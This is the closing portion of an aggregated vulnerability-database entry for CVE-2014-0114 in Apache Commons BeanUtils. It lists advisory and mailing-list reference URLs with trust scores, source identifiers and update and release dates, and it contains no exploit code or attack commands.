Trust: 1.0

url:https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://apache-ignite-developers.2346864.n4.nabble.com/cve-2014-0114-apache-ignite-is-vulnerable-to-existing-cve-2014-0114-td31205.html

Trust: 1.0

url:https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/58947

Trust: 1.0

url:https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/59228

Trust: 1.0

url:https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3ccommits.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3ccommits.dolphinscheduler.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3cuser.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/60177

Trust: 1.0

url:http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/release-notes.txt

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675972

Trust: 1.0

url:https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/58851

Trust: 1.0

url:https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21676375

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21675387

Trust: 1.0

url:http://www-01.ibm.com/support/docview.wss?uid=swg21676303

Trust: 1.0

url:http://advisories.mageia.org/mgasa-2014-0219.html

Trust: 1.0

url:https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html

Trust: 1.0

url:https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e

Trust: 1.0

url:https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3cissues.commons.apache.org%3e

Trust: 1.0

url:http://secunia.com/advisories/59430

Trust: 1.0

url:http://secunia.com/advisories/59014

Trust: 1.0

url:http://jvn.jp/vu/jvnvu96290700/index.html

Trust: 0.8

url:https://www.us-cert.gov/ics/recommended-practices

Trust: 0.8

url:https://www.us-cert.gov/ics/advisories/icsma-20-184-01

Trust: 0.8

url:https://www.fda.gov/medical-devices/digital-health/cybersecurity

Trust: 0.8

url:http://jvndb.jvn.jp/ja/contents/2014/jvndb-2014-000056.html

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0114

Trust: 0.8

url:https://us-cert.cisa.gov/ics/advisories/icsma-20-184-01

Trust: 0.8

url:https://nvd.nist.gov/vuln/detail/cve-2014-0114

Trust: 0.7

url:https://www.redhat.com/mailman/listinfo/rhsa-announce

Trust: 0.2

url:https://access.redhat.com/security/team/contact/

Trust: 0.2

url:https://bugzilla.redhat.com/):

Trust: 0.2

url:https://www.redhat.com/security/data/cve/cve-2014-0114.html

Trust: 0.2

url:https://access.redhat.com/security/updates/classification/#important

Trust: 0.2

url:https://h20564.www2.hp.com/portal/site/hpsc/public/kb/

Trust: 0.2

url:http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Trust: 0.2

url:https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/

Trust: 0.2

url:https://rhn.redhat.com/errata/rhsa-2014-0497.html

Trust: 0.1

url:https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=jboss.fuse&downloadtype=securitypatches&version=6.1.0

Trust: 0.1

url:http://www.debian.org/security/faq

Trust: 0.1

url:http://www.debian.org/security/

Trust: 0.1

url:http://www.openwall.com/ove/

Trust: 0.1

url:https://rhn.redhat.com/errata/rhsa-2014-0474.html

Trust: 0.1

url:https://access.redhat.com/security/team/key/#package

Trust: 0.1

url:https://access.redhat.com/site/articles/11258

Trust: 0.1

url:https://softwaresupport.hpe.com>.

Trust: 0.1

url:https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facets

Trust: 0.1

url:https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755

Trust: 0.1

url:http://www.hpe.com/support/security_bulletin_archive

Trust: 0.1

url:https://www.hpe.com/info/report-security-vulnerability

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2016-0763

Trust: 0.1

url:http://www.hpe.com/support/subscriber_choice

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-3253

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-0107

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2013-6429

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-0050

Trust: 0.1

url:https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-5652

Trust: 0.1

url:http://www.hp.com/jp/icewall_patchaccess

Trust: 0.1

url:http://h30499.www3.hp.com/t5/hp-security-research-blog/protect-your-struts1-a

Trust: 0.1

sources: PACKETSTORM: 126618 // PACKETSTORM: 127957 // PACKETSTORM: 149050 // PACKETSTORM: 126525 // PACKETSTORM: 128873 // PACKETSTORM: 139721 // PACKETSTORM: 126811 // JVNDB: JVNDB-2020-006468 // JVNDB: JVNDB-2014-002308 // NVD: CVE-2014-0114

CREDITS

HP

Trust: 0.3

sources: PACKETSTORM: 128873 // PACKETSTORM: 139721 // PACKETSTORM: 126811

SOURCES

db:VULMONid:CVE-2014-0114
db:PACKETSTORMid:126618
db:PACKETSTORMid:127957
db:PACKETSTORMid:149050
db:PACKETSTORMid:126525
db:PACKETSTORMid:128873
db:PACKETSTORMid:139721
db:PACKETSTORMid:126811
db:JVNDBid:JVNDB-2020-006468
db:JVNDBid:JVNDB-2014-002308
db:NVDid:CVE-2014-0114

LAST UPDATE DATE

2026-03-25T21:47:49.207000+00:00


SOURCES UPDATE DATE

db:VULMONid:CVE-2014-0114date:2023-02-13T00:00:00
db:JVNDBid:JVNDB-2020-006468date:2020-09-01T00:00:00
db:JVNDBid:JVNDB-2014-002308date:2020-09-02T00:00:00
db:NVDid:CVE-2014-0114date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:VULMONid:CVE-2014-0114date:2014-04-30T00:00:00
db:PACKETSTORMid:126618date:2014-05-14T19:24:00
db:PACKETSTORMid:127957date:2014-08-21T19:34:50
db:PACKETSTORMid:149050date:2018-08-23T17:19:18
db:PACKETSTORMid:126525date:2014-05-07T15:04:23
db:PACKETSTORMid:128873date:2014-10-28T18:09:30
db:PACKETSTORMid:139721date:2016-11-15T00:42:48
db:PACKETSTORMid:126811date:2014-05-27T16:17:39
db:JVNDBid:JVNDB-2020-006468date:2020-07-09T00:00:00
db:JVNDBid:JVNDB-2014-002308date:2014-05-01T00:00:00
db:NVDid:CVE-2014-0114date:2014-04-30T10:49:03.973